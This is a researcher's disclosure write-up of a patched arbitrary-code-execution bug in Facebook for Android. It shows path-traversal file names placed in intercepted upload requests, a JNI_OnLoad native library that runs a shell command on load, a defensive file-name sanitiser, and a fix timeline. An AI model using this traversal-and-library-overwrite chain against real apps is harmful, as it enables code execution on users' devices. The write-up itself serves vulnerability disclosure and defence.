Arbitrary code execution on Facebook for Android through a download feature

Sayed Abdelhafiz
3 min read, Oct 2, 2020

TL;DR

Recently I discovered an ACE (arbitrary code execution) in Facebook for Android that can be triggered by downloading a file from a group's Files tab, without ever opening the file.

Background

I was digging into the method Facebook uses to download files from a group and found that it uses two different mechanisms. If the user downloads the file from the post itself, it is downloaded via the built-in Android DownloadManager service, which as far as I know is a safe way to download files. If the user instead downloads the file from the Files tab, a different path is used: in a nutshell, the application fetches the file and then saves it to the Download directory without any filtering of the file name.

Note: the highlighted code is the fix that Facebook pushed; the vulnerable version did not contain it.

Path traversal

The vulnerability was in the second method. Security measures were implemented on the server side when uploading files, but they were easy to bypass. The application simply fetches the file and saves it to, for example, /sdcard/Downloads/FILE_NAME without filtering FILE_NAME for path traversal sequences. The first idea that came to my mind was to use path traversal to overwrite the app's native libraries, which leads to arbitrary code execution.
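As an added illustration (not Facebook's code), here is the unsafe join described above beside a hardened version that keeps only the last path segment and then checks that the canonical target still lives inside the download directory. The class, method names, the download directory and the sample file name are assumptions for this example.

```java
import java.io.File;
import java.io.FileOutputStream;
import java.io.IOException;
import java.io.InputStream;
import java.io.OutputStream;

// Added example, not the app's real code. Directory and names are assumptions.
public final class DownloadSaver {

    /** Vulnerable: the server-supplied name is joined to the directory unchecked. */
    static File unsafeTarget(File downloadDir, String serverFileName) {
        return new File(downloadDir, serverFileName);   // "../../x" escapes downloadDir
    }

    /** Hardened: drop any directory part, then prove the canonical result
     *  is a direct child of the canonical download directory. */
    static File safeTarget(File downloadDir, String serverFileName) throws IOException {
        // 1. A file name must never carry a directory component.
        String base = new File(serverFileName).getName();
        if (base.isEmpty() || base.equals(".") || base.equals("..")) {
            throw new IOException("rejected file name: " + serverFileName);
        }
        // 2. Resolve symlinks and ".." on both sides before comparing. This also
        //    catches a pre-planted symlink named `base` that points elsewhere.
        File dirCanon = downloadDir.getCanonicalFile();
        File target = new File(dirCanon, base).getCanonicalFile();
        // 3. Containment check: the parent must be exactly the download directory.
        if (!dirCanon.equals(target.getParentFile())) {
            throw new IOException("path escapes download dir: " + target);
        }
        return target;
    }

    /** Stream the fetched body to disk using the hardened target. */
    static void save(File downloadDir, String serverFileName, InputStream body) throws IOException {
        File target = safeTarget(downloadDir, serverFileName);
        try (OutputStream out = new FileOutputStream(target)) {
            byte[] buf = new byte[8192];
            int n;
            while ((n = body.read(buf)) != -1) out.write(buf, 0, n);
        }
    }

    public static void main(String[] args) throws IOException {
        File dir = new File("/sdcard/Download");      // assumed download directory
        String name = "../../../sdcard/PoC";          // the traversal name from the post
        System.out.println(unsafeTarget(dir, name));  // /sdcard/Download/../../../sdcard/PoC
        System.out.println(safeTarget(dir, name));    // /sdcard/Download/PoC
    }
}
```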

I set up my Burp Suite proxy, intercepted the upload request, changed the filename to ../../../sdcard/PoC and forwarded the request.

Web upload endpoint

Unfortunately, that wasn't enough: the server-side security measures stripped my path traversal payload. I tried playing with the payload, but none of the variants worked.

Bypass security measures. (Bypass?)

After many payloads I still wasn't able to bypass that filter. I went back to browsing the application for something useful, and it came!

For the first time, I noticed that I could also upload files through the Facebook mobile application. I set up the Burp Suite proxy on my phone, enabled the white-hat settings in the application to bypass SSL pinning, intercepted the upload request and changed the filename to ../../../sdcard/PoC. The file was uploaded successfully, and my payload was now in the filename!

I tried downloading the file from the post, but as I said the DownloadManager service is safe, so the attack didn't work. Then I navigated to the Files tab and downloaded the file from there, and here is our attack: my file was written to /sdcard/PoC!

Being able to perform path traversal, I could now overwrite the app's native libraries and perform an ACE attack.

Exploit

To exploit this, I started a new Android NDK project to build a native library and put my arbitrary code in the JNI_OnLoad function, so that it runs as soon as the library is loaded.

#include <jni.h>
#include <string>
#include <stdlib.h>

// JNI_OnLoad is called by the runtime as soon as the library is loaded, so code
// placed here runs without any Java method having to be invoked. extern "C"
// keeps the symbol unmangled so the loader can find it in a C++ build.
extern "C" JNIEXPORT jint JNICALL JNI_OnLoad(JavaVM* vm, void* reserved) {
    // Marker command: writes the process identity into the app's private directory.
    system("id > /data/data/com.facebook.katana/PoC");
    return JNI_VERSION_1_6;
}

I built the project to get my malicious library, then uploaded it through the mobile upload endpoint and renamed it to /../../../../../data/data/com.facebook.katana/lib-xzs/libbreakpad.so

Our exploit now is ready!

PoC Video: https://youtu.be/j0darcE5apo

Timeline

April 29, 2020, at 5:57 AM: Submitted the report to Facebook.
April 29, 2020, at 11:20 AM: Facebook was able to reproduce it.
April 29, 2020, at 12:17 PM: Triaged.
June 16, 2020, at 12:54 PM: The vulnerability has been fixed.
July 15, 2020, at 5:11 PM: Facebook rewarded me!

Have a nice day!
